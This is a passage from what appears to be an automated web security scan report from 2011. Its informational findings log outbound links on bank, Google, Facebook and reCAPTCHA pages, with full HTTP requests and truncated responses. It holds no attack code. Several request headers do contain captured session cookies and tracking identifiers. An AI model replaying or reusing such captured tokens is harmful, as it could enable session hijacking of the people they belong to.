<a href="http://www.securitythai.com" target="_blank" class="smalltext10">cctv</a><br />
<a href="http://www.tabletpcthai.com" target="_blank" class="smalltext10">TABLETPC</a><br />
<a href="http://www.cctvbangkok.com" target="_blank" class="smalltext10">............ .......</a><br />
<a href="http://www.ipcamerathai.com" target="_blank" class="smalltext10">IP CAMERA</a><br />
<a href="http://game.deksiam.in.th" target="_blank" class="smalltext10">.....</a>
...[SNIP]...
<td><a href="http://www.ktb.co.th" target="_blank"><img src="/donate/pic/logo_q0027704.gif" width="60" height="60" border="0" alt="Krung Thai Bank PCL" />
...[SNIP]...
</font> <a href="http://www.ktb.co.th" target="_blank">Krung Thai Bank PCL</a>
...[SNIP]...
<td bgcolor="#ffffff">&nbsp;1)<a href="http://studentloan.or.th" target="_blank">studentloan.or.th</a>
...[SNIP]...
<td bgcolor="#ffffff">&nbsp;2)<a href="http://krungthai-axa.co.th" target="_blank">krungthai-axa.co.th</a>
...[SNIP]...
<td bgcolor="#ffffff">&nbsp;3)<a href="http://zest.co.th" target="_blank">zest.co.th</a>
...[SNIP]...
<td bgcolor="#ffffff">&nbsp;4)<a href="http://paysbuy.com" target="_blank">paysbuy.com</a>
...[SNIP]...
<td bgcolor="#ffffff">&nbsp;5)<a href="http://dhipaya.co.th" target="_blank">dhipaya.co.th</a>
...[SNIP]...
<td bgcolor="#ffffff">&nbsp;6)<a href="http://ktc.co.th" target="_blank">ktc.co.th</a>
...[SNIP]...
<td bgcolor="#ffffff">&nbsp;7)<a href="http://secure1.asiasoft.co.th" target="_blank">secure1.asiasoft.co.th</a>
...[SNIP]...
<td bgcolor="#ffffff">&nbsp;8)<a href="http://bot.or.th" target="_blank">bot.or.th</a>
...[SNIP]...
<td bgcolor="#ffffff">&nbsp;9)<a href="http://intranet.ktb" target="_blank">intranet.ktb</a>
...[SNIP]...
<td bgcolor="#ffffff">&nbsp;10)<a href="http://fwdder.com" target="_blank">fwdder.com</a>
...[SNIP]...
<td bgcolor="#ffffff">&nbsp;11)<a href="http://dpa.or.th" target="_blank">dpa.or.th</a>
...[SNIP]...
<td bgcolor="#ffffff">&nbsp;12)<a href="http://pantip.com" target="_blank">pantip.com</a>
...[SNIP]...
<td bgcolor="#ffffff">&nbsp;13)<a href="http://oknation.net" target="_blank">oknation.net</a>
...[SNIP]...
</b>
<a href="http://www.thaisite.net" target="_blank">.............</a>
...[SNIP]...
<div align="center">
<a href="http://www.jobth.com" target="_blank">.....</a> |
<a href="http://www.thaihealth.net" target="_blank">......</a> |
<a href="http://9425fm.com" target="_blank">........</a> |
<a href="http://www.jobth.com/newjobtoday.php" target="_blank">..............</a> |
<a href="http://www.jobth.com/searchjobbytypejob.php?gid=000023" target="_blank">... part time</a> |
<a href="http://game.thaihealth.net" target="_blank">.....</a> |
<a href="http://www.autoflight.net" target="_blank">.........</a> |
<a href="http://www.autoflight.co.th" target="_blank">............</a> |
<a href="http://www.programbuncheethai.com" target="_blank">....... BOQ</a> |
<a href="http://www.cctvbangkok.com" target="_blank">............</a> |
<a href="http://www.muic.mahidol.ac.th/eng/" target="_blank">MUIC</a> |
<a href="http://www.mediasearch.co.th" target="_blank">CCTV</a> |
<a href="http://www.joelookyoung.com/AsianLife-JoeLookYoung-Bim100/Testimonial-Bim100-GM-1.html" target="_blank">BIM100</a> |
<a href="http://www.dochost.net" target="_blank">hosting</a> |
<a href="http://www.zonevdo.com/" target="_blank">......</a> |
<a href="http://www.thaisabuy.com" target="_blank">.................</a> |
<a href="http://www.nooblue.com/" target="_blank">SEO</a> |
<a href="http://www.dogilike.com" target="_blank">...</a> |
<a href="http://www.bunditchula.net" target="_blank">..........</a> |
<a href="http://www.sansiri.com" target="_blank">...........</a>
...[SNIP]...
<td>
<a href="http://validator.w3.org/check?uri=referer" target="_blank"><img src="/image/html.gif" border="0" alt="Valid XHTML 1.0 Strict" />
...[SNIP]...
<td width="69" rowspan="2" align="center"><a href="http://twitter.com/ktb_care" target="_blank" rel="nofollow" ><img src="/images/twit.gif" width="58" height="49" border="0" alt="" />
...[SNIP]...
</div>-->

<script type="text/javascript" src="http://paidoo.net/js/paidoo_mynews.js"></script>
...[SNIP]...

22.26. http://webcache.googleusercontent.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webcache.googleusercontent.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=cache:_Is84meKSVgJ:https://www.barclaycardus.com/+barkley+bank&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com HTTP/1.1
Host: webcache.googleusercontent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 03 May 2011 13:28:10 GMT
Expires: -1
Cache-Control: private, max-age=0
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<base href="https://www.barclaycardus.com/"><div style="margin:-1px -1px 0;padding:0;border:1px solid #999;background:#fff"><div style="margin:12px;padding:8px;border:1px solid #999;background:#ddd;font:13px arial,sans-serif;color:#000;font-weight:normal;text-align:left">This is Google&#39;s cache of <a href="https://www.barclaycardus.com/" style="text-decoration:underline;color:#00c">https://www.barclaycardus.com/</a>. It is a snapshot of the page as it appeared on May 3, 2011 09:00:13 GMT. The <a href="https://www.barclaycardus.com/" style="text-decoration:underline;color:#00c">current page</a> could have changed in the meantime. <a href="http://www.google.com/intl/en/help/features_list.html#cached" style="text-decoration:underline;color:#00c">Learn more</a>
...[SNIP]...
<head>

<script src="https://www.barclaycardus.com/app/ccsite/flashElements/js/swfobject_modified-min.js" type="text/javascript"></script>
<script src="https://www.barclaycardus.com/app/ccsite/flashElements/js/AC_RunActiveContent-min.js" type="text/javascript"></script>
...[SNIP]...
</title>
<link href="https://www.barclaycardus.com/app/ccsite/styles/barclaycardus.jsp" rel="stylesheet" type="text/css">
<script src="/app/ccsite/js/cookies-min.js" type="text/javascript">
...[SNIP]...
<li><a href="https://www.barclaycardus.com/app/ccsite/action/home">

Home</a>
...[SNIP]...
<li><a href="https://www.barclaycardus.com/app/ccsite/logon/loginUserDyn.jsp">Secure Login</a>
...[SNIP]...
<li><a href="https://www.barclaycardus.com/app/ccsite/help/emailDynamic.jsp" target="_top">Contact Us</a>
...[SNIP]...
<li><a href="https://www.barclaycardus.com/app/ccsite/help/helpfaqDynamic.jsp" target="_top">FAQs</a>
...[SNIP]...
<div id="secureLogin">
   Existing Cardmembers <a href="https://www.barclaycardus.com/app/ccsite/logon/loginUserDyn.jsp"><img src="https://gif.juniper.com/images/barclaycardus/secure_login.jpg" alt="secure login" align="middle" ></a>
...[SNIP]...
</span>
<a href="http://www.joinbarclays.com">Career site</a>
...[SNIP]...
<li><a href="http://www.aboutbarclaycardus.com/aboutus.php" target="_self">About</a>
...[SNIP]...
<li><a href="http://www.aboutbarclaycardus.com/news.php" target="_self">News</a>
...[SNIP]...
<li><a href="http://www.aboutbarclaycardus.com/products.php" target="_self">Products &amp; Resources</a>
...[SNIP]...
<li><a href="http://www.aboutbarclaycardus.com/partners.php" target="_self">Partners</a>
...[SNIP]...
<li><a href="http://www.aboutbarclaycardus.com/mobile_payments.php" target="_self">Mobile Payments</a>
...[SNIP]...
<noscript>
               <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="700" height="504" id="accord_menu" align="middle">
               <param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
<param name="bgcolor" value="#ffffff" />    <embed src="https://www.barclaycardus.com/app/ccsite/flashElements/innovation.swf" quality="high" bgcolor="#ffffff" width="700" height="504" align="middle" allowScriptAccess="sameDomain" allowFullScreen="false" type="application/x-shockwave-flash" pluginspage="https://www.macromedia.com/go/getflashplayer" />
               </object>
...[SNIP]...
</p>
<a href="https://www.barclaycardus.com/app/ccsite/logon/registerDynamic.jsp" class="setupOnline"><img src="https://gif.juniper.com/images/barclaycardus/setup_button.jpg" alt="set up online access" ></a>
...[SNIP]...
<a href="javascript:checkLogin()"><img name="login" id="login" src="https://gif.juniper.com/images/barclaycardus/login_button.jpg" value="" tabindex="1"></a>
                       <script src="https://www.barclaycardus.com/app/ccsite/js/function_passmark-min.js" language="JavaScript" type="text/javascript"></script>
...[SNIP]...
<br><a href="http://www.myapplicationstatus.com/barclays">Check the status</a>
...[SNIP]...
<div id="copyrightBar">
   <img src="https://gif.juniper.com/images/barclaycardus/arrow_icon.jpg" align="bottom" />
<a href="http://www.barclaycard.com/templates/home.html">Explore Barclaycard &mdash; The International Payment Business</a>
...[SNIP]...
<div id="cmafooter">
   <a class="cmalink" href="https://www.barclaycardus.com/app/ccsite/action/requestCMA">Click here to request your Cardmember Agreement</a>
...[SNIP]...
<div id="icons">


<a href="https://www.barclaycardus.com/app/ccsite/legal/privacyDynamic.jsp" class="btmfooter">Privacy &amp; Security</a>

<a href="http://www.fdic.gov/" target="_blank" title="FDIC"><img src="https://gif.juniper.com/images/barclays/home/fdic.gif" width="39" height="18" alt="FDIC" border="0" hspace="2"></a>
<a href="https://www.bbb.org/online/consumer/cks.aspx?id=101041611354816099" target="_blank" title="BBB Online"><img src="https://gif.juniper.com/images/barclays/home/bbb_logo.gif" border="0" hspace="2"></a>
<a href="http://www.verisign.com/" target="_blank" title="Verisign"><img src="https://gif.juniper.com/images/barclays/home/verisign_logo.gif" width="67" height="33" alt="Verisign" border="0" hspace="2"></a>
<a href="http://www.rsasecurity.com/" target="_blank" title="RSA Security"><img src="https://gif.juniper.com/images/barclays/ffiec/pmlogo.gif" alt="RSA Security" border="0" hspace="2"></a>
...[SNIP]...

22.27. http://webcache.googleusercontent.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webcache.googleusercontent.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q\\x3dcache:1oykk20vjxIJ:www.youtube.com/watch%3Fv%3DNuitJC5romI+thailand+breast+slap\\x26amp;cd\\x3d1\\x26amp;hl\\x3den\\x26amp;ct\\x3dclnk\\x26amp;gl\\x3dus\\x26amp;source\\x3dwww.google.com\\x22 HTTP/1.1
Host: webcache.googleusercontent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 03 May 2011 13:28:10 GMT
Server: sffe
Content-Length: 12040
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html>
<html lang=en>
<meta charset=utf-8>
<title>Error 404 (Not Found)!!1</title>
<style>
*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:
...[SNIP]...
</style>
<a href=//www.google.com/ id=g><img src=//www.google.com/images/logo_sm.gif alt=Google></a>
...[SNIP]...

22.28. http://www.bangkokbank.com/_layouts/NR/JavaScript/truehitsstat.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokbank.com
Path:   /_layouts/NR/JavaScript/truehitsstat.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /_layouts/NR/JavaScript/truehitsstat.asp?pagename=Home-En HTTP/1.1
Host: www.bangkokbank.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokbank.com/bangkok%20bank/pages/main.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 443
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADTTCQT=PFGICGIDJBLAOOFHIKHEOBNN; path=/
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:44:51 GMT
Age: 0
Proxy-Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMsSf ])

<script language='javascript1.1'>
   page='Home-En';
</script>
<script language='javascript1.1' src='http://hits.truehits.in.th/data/k0019767.js'> </script>
<NOSCRIPT>
<a target="_blank" href="http://truehits.net/stat.php?id=k0019767"><img src="http://hits.truehits.in.th/noscript.php?id=k0019767" alt="Thailand Web Stat" border=0 width=14 height=17></a>
<a target="_blank" href="http://truehits.net/">Truehits.net</a>
...[SNIP]...

22.29. http://www.barclays.co.uk/Savings/ISAs/H1242557860616  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barclays.co.uk
Path:   /Savings/ISAs/H1242557860616

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Savings/ISAs/H1242557860616?selectedGroupName=ISAs HTTP/1.1
Host: www.barclays.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1304436224|session#1304436163124-351101#1304438024; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454253315:ss=1304454071727; SS_X_JSESSIONID=00004_zLOQV_87a8PfwOVHjEuuh%3A149iif9ed

Response

HTTP/1.1 200 OK
Server: BLUE
Date: Tue, 03 May 2011 10:24:21 GMT
Content-language: en-GB
Last-modified: Tue, 03 May 2011 10:24:21 GMT
Content-type: text/html;charset=UTF-8
Set-cookie: JSESSIONID=8C53C5C0D340CC662989C40DAC749BDA; Path=/cs; Secure
Set-cookie: SS_X_JSESSIONID=00004_zLOQV_87a8PfwOVHjEuuh%3A149iif9ed; Path=/
Content-Length: 56427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Barclays Savings | Our Best Savi
...[SNIP]...
<div>
<img alt="" id="DCSIMG" width="1" height="1" src='http://statse.webtrendslive.com/dcssxcr8i00000stlemt7jpvp_8c9t/njs.gif?dcsuri=/nojavascript&#38;amp;WT.js=No&#38;amp;WT.tv=8.0.2' />
</div>
...[SNIP]...
<li>
<a href="http://www.barclayswealth.com/international/client-services/international-student-family-package.htm" class="popup" title="This link opens in a new window" rel='' onmousedown="dcsMultiTrack('DCS.dcsuri','BarclaysSavingsOurBestSavingsAccountsandISAsSavingsBonds/Footer/InternationalStudentAccount', 'WT.ti', '','WT.dl','1');">
International Student Account</a>
...[SNIP]...
<li>
<a href="https://www.barclaysfantasyfundmanager.co.uk/ " rel='' onmousedown="dcsMultiTrack('DCS.dcsuri','BarclaysSavingsOurBestSavingsAccountsandISAsSavingsBonds/Footer/invhubfantasygamebutton', 'WT.ti', '','WT.dl','1');">
Fantasy Investment Portfolio game</a>
...[SNIP]...
<p>
<a class="premier-league" href="http://www.premierleague.com/page/Home/0,,12306,00.html" title="Link through to Barclays Premiership website">
<span class="premier-league">
...[SNIP]...

22.30. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D298028%26v%3Dnbcu_featured-products&layout=standard&show_faces=false&width=260&action=like&font=arial&colorscheme=light&height=25 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php?p=298028&v=nbcu_featured-products
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.175.123
X-Cnection: close
Date: Tue, 03 May 2011 13:33:15 GMT
Content-Length: 7778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/g5ZRpvzi0gh.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
...[SNIP]...

22.31. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/like.php?&width=400&height=80&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110503_0700%26ssh%3DS995825291%26FORM%3DHPFBLK%26mkt%3Den-US%26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.47.43
X-Cnection: close
Date: Tue, 03 May 2011 12:12:45 GMT
Content-Length: 8633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/FGFAI5AC1WM.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
...[SNIP]...

22.32. http://www.google.com/recaptcha/api/js/recaptcha_ajax.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /recaptcha/api/js/recaptcha_ajax.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /recaptcha/api/js/recaptcha_ajax.js?legacy HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php?p=298028&v=nbcu_featured-products
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=RACm2p_svkNXT9kmPNNa2pmbIebhGEEdGvu8PhhGkJ9zznm733-waqKePrNGlT88Xsw82hDwJTZEPZsEDoV24RHvVDlX5AlHsvzRhK-BF3PWHEps_vH_Y7JEnnkOz64a

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Expires: Tue, 03 May 2011 14:18:42 GMT
Last-Modified: Tue, 05 Apr 2011 15:01:21 GMT
Date: Tue, 03 May 2011 13:18:42 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Age: 464
Cache-Control: public, max-age=3600
Content-Length: 25745

var RecaptchaTemplates={};RecaptchaTemplates.VertHtml='<table id="recaptcha_table" class="recaptchatable" > <tr> <td colspan="6" class=\'recaptcha_r1_c1\'></td> </tr> <tr> <td class=\'recaptcha_r2_c1\
...[SNIP]...
l:function(){var a=Recaptcha,b=RecaptchaState,c=Recaptcha.$,c=b.server+"image?c="+b.challenge;c.indexOf("https://")==0&&(c="http://"+c.substring(8));b=b.server+"/img/audiocaptcha.swf?v2";a=a._is_ie()?'<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="audiocaptcha" width="0" height="0" codebase="https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab"><param name="movie" value="'+
b+'" />
...[SNIP]...

22.33. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=Siam+Commercial+Bank HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: rU20-FBA
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=HfFdn9n5LQSBV_6qMo8w5eh1JPxJ22N4d7ME-n4CpoG0Pt1fAvuZFMASF-UtF6oB21IuFyfkLpYaH0m_T3hMrA31Aueqwtif5xnsXw2EUw1C8kNgsQLLVpzPIAlyXsyf

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:24:36 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 36591

f94-wCe9....S....o...b..,....T.....h...<!doctype html> <head> <title>Siam Commercial Bank - Google Search</title> <script>window.google={kEI:"BPS_TYe_D4ygtwf27IjXBA",kEXPI:"17259,24472,25907,2714
...[SNIP]...
</a> - <a href="http://www.scb.co.th/en/about-scb/contact-scb./^.Z1','','0CDEQ0gIoATAA')">Contact us</a> - <a href="http://www.scb.co.th/en/business-banking./^.Y1','','0CDIQ0gIoAjAA')">Business Banking</a> - <a href="http://www.scb.co.th/en/about-scb./^.T1','','0CDMQ0gIoAzAA')">About SCB</a>
...[SNIP]...

22.34. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=Krungthai+Bank HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: rU20-FBA
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=HfFdn9n5LQSBV_6qMo8w5eh1JPxJ22N4d7ME-n4CpoG0Pt1fAvuZFMASF-UtF6oB21IuFyfkLpYaH0m_T3hMrA31Aueqwtif5xnsXw2EUw1C8kNgsQLLVpzPIAlyXsyf

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:44:39 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 35576

f94-wCe9....S....o...`..0....R.........<!doctype html> <head> <title>Krungthai Bank - Google Search</title> <script>window.google={kEI:"p-q_TeXNAtCitgfO3oCrBQ",kEXPI:"17259,24472,25907,27147,2851
...[SNIP]...
</a> - <a href="http://www.ktb.co.th/th/products_services/e-banking.jsp./^.v2','','0CDYQ0gIoATAB')">.......................................</a> - <a href="http://www.ktb.co.th/th/career/main.jsp./^.x2','','0CDcQ0gIoAjAB')">........................</a> - <a href="http://www.npashowroom.ktb.co.th/WebShowRoom/HomeServlet./^.n2','','0CDgQ0gIoAzAB')">..........................................</a>
...[SNIP]...

22.35. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=barkley+bank HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=HfFdn9n5LQSBV_6qMo8w5eh1JPxJ22N4d7ME-n4CpoG0Pt1fAvuZFMASF-UtF6oB21IuFyfkLpYaH0m_T3hMrA31Aueqwtif5xnsXw2EUw1C8kNgsQLLVpzPIAlyXsyf

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:20:30 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/rU20-FBA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 81267

<!doctype html> <head> <title>barkley bank - Google Search</title> <script>window.google={kEI:"7ta_TdvPDJLqgQepy7jrBQ",kEXPI:"17259,24472,25907,27147,28514,28766,28887,29481,29509,29681,29685,297
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=barkley+bank&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="https://www.barclaycardus.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBYQFjAA')">Welcome - Credit Card Account Home</a>
...[SNIP]...
<div class=osl><a href="https://www.barclaycardus.com/app/ccsite/logon/loginUserDyn.jsp" onmousedown="return clk(this.href,'','','','1','','0CB0Q0gIoADAA')">Secure Login</a> - <a href="https://www.barclaycardus.com/app/ccsite/logon/registerDynamic.jsp" onmousedown="return clk(this.href,'','','','1','','0CB4Q0gIoATAA')">Setup Account Access</a> - <a href="https://www.barclaycardus.com/apply/Landing.action?campaignId=1465&amp;cellNumber=68&amp;source=aepothertbd10" onmousedown="return clk(this.href,'','','','1','','0CB8Q0gIoAjAA')">Dividend Miles World MasterCard(R)</a> - <a href="https://www.barclaycardus.com/app/ccsite/help/helpfaqDynamic.jsp" onmousedown="return clk(this.href,'','','','1','','0CCAQ0gIoAzAA')">FAQs</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:_Is84meKSVgJ:https://www.barclaycardus.com/+barkley+bank&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CBsQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://group.barclays.com/" class=l onmousedown="return clk(this.href,'','','','2','','0CCIQFjAB')">Barclays.com - Home</a>
...[SNIP]...
